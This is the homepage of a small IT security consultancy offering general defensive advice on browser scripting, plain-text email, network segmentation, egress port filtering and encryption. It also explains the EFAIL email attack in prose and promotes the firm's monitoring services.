Welcome to AllIncontext
Our
motto
(top right) encapsulates
the
principle
that whatever you might be doing today (either offline or online), you will need to create or consume data and the
information that derives from it. In doing so, you can
benefit in time and cost, but remember that your data exists in a
security context which might be a
deficit in time and cost unless you are careful.
Note: the motto is based on two of Benjamin Franklin's quotations.
To minimize attack vectors, and keep yourself relatively safe:
- On a PC: Use a Web Browser which allows you to control scripting and either disable scripting for the Internet or allow scripts for a limited time. This infers either the use of Internet Explorer 11 (you can disable Scripting and ActiveX controls for the Inrernet Zone), or Mozilla Firefox with NoScript. The latter might be preferable to any modern HTML5 Web Browser controlled by a large Tech company: Google Chrome and Microsoft Edge.
- On a PC: Never directly read an Email Message because it might be rendered as HTML. Read it indirectly if possible as Plain Text. Extended MAPI allows Outlook Messages to be read this way.
- On a Network: Ensure your core Network connects to the Internet in a stealthy way. That is, you don't have Ports open to Probes. Check with something like Gibson Research Corporation
Shields UP!
(HTTPS Direct. There are others). If you need Servers with Internet connection, put them on a separate Network with its own Internet connection. If you can't afford that, then put them on a separate Network segment. A reasonable overview is this SANS Institute
link
(HTTPS Direct, PDF) dated 08 Jan 2005, but contains good advice. If you want to think about Network segmentation relating to Business Roles, then people with Roles which need to communicate must be in the same Network segment, otherwise they will have to cross a Security boundary in a well designed and segmented Network.
- On a Network: Test for Egress Filtering of Ports in the range 1 to 65535. By default, all these Ports should be blocked from gaining access to the Internet. Only Ports:
- 21 (File Transfer Protocol, FTP, if you really need it).
- 25 (Simple Mail Transport Protocol, SMTP). Since this Port is used for Relaying, many Internet Service providers (ISPs) block this Port, so use Port 2525.
- 43 (Whois Protocol).
- 53 (Domain Name System, DNS).
- 80 (HTTP).
- 110 (Post Office Protocol, POP3).
- 123 (Network Time Protocol, NTP).
- 143 (Internet Message Access Protocol, IMAP).
- 220 (IMAP, version 3).
- 443 (HTTPS).
- 465 (SMTP over TLS. Deprecated, so this Port is usually Closed).
- 587 (Outgoing SMTP Server over TLS).
- 993 (IMAP over TLS).
- 995 (POP3 over TLS).
- 2525 (SMTP, alternative to Port 25).
- 4321 (Referral Whois Protocol, RWhois).
should be open to gain access to the Internet (and if you're not using POP3, or IMAP, don't open those Ports). Any other Port must be supported by a valid Business case. For example, although unofficial, access to Web site Control Panels (like Plesk) is done on Port 8443 over TLS to be secure. Such an open Port probably needs to be restricted to one, or a few, local IP Addresses. One way to do this is to define a specific Service related to the Port and IP Address(es) and then Apply that as a Firewall Rule. Port testing can be done using the
AllPorts.Exposed
(HTTPS Direct) Web site and some PowerShell code.
Why do this? Because you
cannot guarantee that every Script and Network access is safe, so you need to
deny Scripting to HTML content and
deny Network Access using Firewall Rules and Access Controls. This will limit Data collection (such as Web site Analytics). The items above are the main ways of attacking your PC and Network. What about Software Restriction Policies (SRP) and AppLocker? These might be bypassed if the Hack is Fileless, so you want to try to avoid the Hack code in the first place.
Remember, Data is a
Toxic Asset
(HTTPS Direct. This phrase was first coined by the Cryptographer Bruce Schneier. Have a look at his Schneier on Security
blog) when it exists as
Plain Text. When Data is in
Flight, or at
Rest, its Toxicity can be reduced by
Encryption. The advent of the EU General Data Protection Regulation (GDPR) means that you
must have Policies and Standard Operating Procedures (SOPs) to address
both Data
Classification and
Categorization. If you ignore these two requirements, you might be liable for large Fines in the event that you, either as an Individual, or a Company, suffer a
Data Breach. The
corollary
(HTTPS Direct) of Encrypted Data is that you
must pay attention to Managing that Data. AllIncontext can help you with this.
To mitigate the Risk to your Data, you can deploy defences like an Intrusion Detection System (
IDS [HTTPS Direct]), or a Security Information and Event Management System (
SIEM [HTTPS Direct]). However, these systems alert you about any potential risk
after the event. You might also find it difficult to get people with the right Skill-set to build and Operate an effective IDS or SIEM. The Cybersecurity blogger Florian Roth has an excellent
blog
(HTTPS Direct) about what drives people with this Skill-set (You might want to Search that blog for the word
ISACA to see the graphic on the
2016 Cybersecurity Skills Gap).
So, you really need a
strategy that includes the eyes of the many rather than those of the few in order to try to catch these Data events sooner, preferably while the attempt is being made. This means that you need Tools to be used by the many, which are effective and are not burdensome. AllIncontext can help you with this.
The Internet gives you a great access mechanism to Data and Information, but if you do
not know about, or control, your own Data and Information, somebody else might. We therefore provide programs, some of which
can be used freely, and expertise which can be used on Windows PC's
by both individuals and organizations (both small and large) to achieve
that
better use.
A potential solution to the Toxic Data problem is the use of a
Homomorphic Encryption Scheme. This basically Encrypts Data using a Public Key, and you use a Query, Encrypted with the same Public Key, that is Run against the Encrypted Data. You get out an Encrypted Result Set which can be Decrypted with your Private Key. At no point is Plain Text revealed, so your Encrypted Data can be stored wherever you want.
The
catch is that Craig Gentry (of IBM) only proposed the first fully-
Homomorphic (HTTPS Direct) Encryption scheme in 2009. As of 2018, it is still not computationally practical for general purpose use. To put the computational deficit into
context, see The Register
blog (HTTPS Direct) dated 08 Mar 2018 by
Richard Chigwin, which points out that IBM's first practical tests on
Cipher Text ran
100 Trillion times slower than operating on Plain Text. IBM has since speeded the Cipher Text operations by
2 Million times, but only by using a
16-Core Server. The C++ HELib library (which underpins the Encryption) has been re-coded to speed operations up by a maximum of
75 times. However, that means that the deficit is still in the
Trillion times range. So, Encrypting Data has a Cost (and Risk) versus the Benefit and any Company, or Individual, will have to decide what Data is Encrypted, using current Symmetric, and Public Key, Encryption, and where to Encrypt that Data.
However, the show must go on and a Company needs to keep Day-to-Day Operations running. So, in the meantine, to give you a flavour of what we can do for you, consider the following:
- Did you know that at least 650
organizations world-wide can put X509 digital certificates onto your
PC silently? These are used for accessing secure web sites but can also be used to spy on you.
Notable breaches
have already happened. Your certificate stores should be regularly scanned.
- When you receive an Email message do you know who actually sent it? Many organizations use third parties that
provide bulk mailing and marketing services. If you open such a message, even from someone you
trust, you might
be providing that organization with personal data if the message is constructed using HMTL instead of plain text.
You should know the risk for each message, and it is not just about detecting
spam.
**** Update: 16 Jul 2018. The 14 May 2018
EFAIL
(HTTPS Direct) Attack vector is the direct consequence of the Collision of Two Standards: Simple Mail Transport Protocol
(SMTP
[HTTPS Direct]) and the Hypertext Markup Language
(HTML
[HTTPS Direct]). The HTML Body of the Email Message had an Img Tag that spanned the Encrypted Data. The consequence was that the Email Client Decrypted the Cipher Text and then HTML resolved the Img Tag which meant that the Decrypted Data was sent to the Web Server Hosting that Image. Email messages are only relatively Secure if they consist of a Plain Text Body which can Leak Data and Encrypted Attachments which are not susceptible to the processing which happens to the Email Body. Note that neither of the Data Encryption Standards (de facto, or otherwise) of Pretty Good Privacy
(PGP
[HTTPS Direct]) and Secure/Multipurpose Internet Mail Extensions
(S/MIME
[HTTPS Direct]) were compromised with respect to their Cryptographic Primitive functions (that is, How Data is Encrypted and Decrypted).
- Do you regularly back-up your data? If you do, how easy is it to recover a specific instance of that data
when you need it (and do you keep just one copy or several in order to track changes in that data)? Is your data
encrypted (either using symmetric or asymmetric keys)? If your data is in the
Cloud
you should encrypt it.
- Do you know what events are taking place on your Windows PC? The operating system, and programs, place
messages into the
event log. If you
are unaware of these events, your Windows PC might not work optimally.
- Do you know whether the components making up your PC are working correctly or not? If not, your PC might develop a
problem about which you are not aware. A Windows PC uses Windows Management Instrumentation
(also called WMI)
for this purpose. WMI events should be monitored on a regular basis.
- Do you know who is scanning your ADSL
router? If not then you should consider using a
syslog
daemon to monitor which
IP
addresses are attempting to do this.
- Do you use an Uninterruptible Power Supply (UPS)
to protect one or more servers? If so, do you
monitor it or is it capable of putting an event in the log?
If you answer
No to any of the above, we can help you.
We have more than 40 years experience of: Theory and Computer Modelling of the Quantum Mechanical effects of
Excitons
(HTTPS Direct) in Impure Organic Molecular Crystals (British Libraray EThOS
link
[HTTP Direct, not Secure]); Working with technology in research, in a government run computer laboratory (Rutherford Appleton
Laboratory
[HTTPS Direct]) and in
the private sector. That experience covers: Computer animated film making and 3D modeling;
ISO
graphics standards; Implementing and managing a large company Help Desk; PC security; Printing strategy;
Re-developing (twice) a company's world-wide data feeds for Distribution Requirements Planning
(
DRP)
to take advantage of new technology; Implementing both
Novell (remember them) and Windows Local Area Networks
(
LANs)
on a large company site;
Implementing long-line
ISDN
(the forerunner to ADSL) across the UK for a business unit of a world-wide company;
De-commissioning the IT and Infrastructure for a world-wide company's headquarters site.
Benjamin Franklin Quotations
The basis of the motto is two quotations from
Benjamin Franklin
(HTTPS Direct) and his Poor Richard's Almanac:
- An investment in knowledge always pays the best interest.
- You may delay, but time will not.
More of his quotations can be found
here
(Google Secure Webcache).
This Web site
Use the
category links at the top of the page to move around the site, and the
You are here breadcrumb
to move within a category.
This web site is deliberately kept simple and only uses
XHTML
(no client side scripting) to keep you safe.
To send us a message, use the contact link above.
Our information
security policy is simple. We retain personal information required under
UK law
(for example names and addresses on invoices) and that which you communicate directly to us. This is not shared with
third parties. Information used for software trials contains no personal data.
Click
here
to see how this web site treats web page links external to AllIncontext (the exceptions are the
W3C
image links below, which you can click on to verify that the current page conforms to the XHTML 1.0 standard
(but
why use it?) and that the
Cascading Style Sheet used for the page conforms to the CSS 2.1 standard.
If you find a page that no longer validiates, please let us know using the contact link at the top of this page). See this
link for more on this Web site Design Philosophy (and other things, such as Writing Style).